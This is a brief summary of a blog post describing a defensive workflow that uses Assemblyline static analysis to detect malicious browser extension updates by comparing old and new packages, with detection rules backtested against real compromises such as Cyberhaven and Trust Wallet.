Moving up the Assemblyline: Exposing malicious code in browser extensions

This blog explains a proactive workflow using Assemblyline to detect malicious browser extension updates by submitting both old and new extension packages for static analysis, comparing differences (new domains, updated service workers/content scripts, new permissions, new Assemblyline detections, anomalous script characteristics), and raising alerts based on five tuned detection rules; the approach was backtested against five real-world malicious extension updates (including Cyberhaven and Trust Wallet) and successfully identified most compromises.